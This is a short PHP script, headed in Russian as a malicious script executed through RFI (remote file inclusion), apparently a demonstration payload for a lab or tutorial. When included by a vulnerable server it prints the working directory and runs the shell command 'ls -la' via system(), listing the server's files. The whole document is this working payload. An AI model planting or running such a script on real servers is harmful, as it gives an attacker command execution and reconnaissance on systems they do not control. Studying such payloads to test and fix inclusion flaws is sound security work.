<?php
echo "<h1>Это вредоносный скрипт, выполненный через RFI!</h1>";
echo "<p>Текущая директория: " . getcwd() . "</p>";
echo "<p>Содержимое текущей директории:</p>";
echo "<pre>";
system('ls -la');
echo "</pre>";
?>
